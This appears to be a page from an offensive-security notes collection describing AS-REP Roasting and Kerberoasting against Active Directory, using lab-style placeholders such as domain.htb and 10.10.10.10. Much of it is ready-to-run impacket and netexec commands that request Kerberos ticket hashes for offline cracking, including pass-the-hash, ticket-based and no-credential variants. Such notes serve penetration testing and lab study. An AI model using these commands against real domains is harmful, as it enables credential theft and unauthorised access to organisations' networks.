🎭Attacking Kerberos
This guide covers common attack techniques against Kerberos authentication in Active Directory environments.
AS-REP Roast Attack
If you have a list of valid users, you can perform an AS-REP Roast Attack to obtain a Ticket Granting Ticket (TGT) and then crack its hash to get the password.
This attack queries the Domain Controller (DC) to check if any of the users in your list have the Kerberos flag DONT_REQ_PREAUTH
enabled.
The attack can be attempted multiple times as you discover more valid users. From BloodHound, you can identify users with this condition.
Commands
# AS-REP Roast using impacket-GetNPUsers
impacket-GetNPUsers -no-pass -usersfile users.txt domain.htb/ 2>/dev/null
# AS-REP Roast through impacket-GetNPUsers with a while loop
while read username; do impacket-GetNPUsers domain.htb/"$username" -request -no-pass -dc-ip 10.10.10.10 >> hashes.txt; done < users.txt 2>/dev/null
# AS-REP Roast through netexec
netexec ldap 10.10.10.10 -u users.txt -p '' --asreproast hashes.txt
Kerberoasting Attack
If you have valid credentials for a domain user, you can perform a Kerberoasting Attack to obtain a Ticket Granting Service (TGS) from a user that has a servicePrincipalName (SPN) assigned.
The obtained hash can be cracked to retrieve the credentials in plaintext.
Commands
# Kerberoasting Attack through impacket-GetUserSPNs with basic authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/'user':'password' -request 2>/dev/null
# Kerberoasting Attack through Kerberos authentication (requires TGT ticket in KRB5CCNAME)
impacket-GetUserSPNs -dc-ip 10.10.10.10 -dc-host dc.domain.htb domain.htb/user -k -no-pass -request 2>/dev/null
# Kerberoasting Attack using Pass-the-Hash
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user -hashes :<NTLM_HASH> -request 2>/dev/null
# Kerberoasting Attack through netexec
netexec ldap 10.10.10.10 -u 'user' -p 'password' --kerberoasting output.txt
Exception: Kerberoasting Without Credentials
There is an exception to perform the Kerberoasting Attack without having valid credentials.
If you know there is a user that is vulnerable to AS-REP Roast (i.e., the user has the DONT_REQ_PREAUTH
flag enabled), you can also perform this attack without valid credentials.
In this case, the user called usuarioASREP is susceptible to an AS-REP Roast, meaning it has the Kerberos DONT_REQ_PREAUTH
flag enabled.
Therefore, you can perform a Kerberoasting Attack without having valid domain credentials, but having a user that is susceptible to AS-REP Roast.
impacket-GetUserSPNs -no-preauth 'usuarioASREP' -request -usersfile users.txt domain.htb/ -dc-ip 10.10.10.10 2>/dev/null
Key Points
AS-REP Roast targets users with
DONT_REQ_PREAUTH
flag enabledKerberoasting targets users with Service Principal Names (SPNs)
Both attacks can yield hashes that may be crackable offline
BloodHound can help identify vulnerable users
Multiple authentication methods are available (credentials, hashes, tickets)
Tools Used
impacket-GetNPUsers
- For AS-REP Roast attacksimpacket-GetUserSPNs
- For Kerberoasting attacksnetexec
- Alternative tool for both attack typesBloodHound
- For reconnaissance and identifying vulnerable accounts
Last updated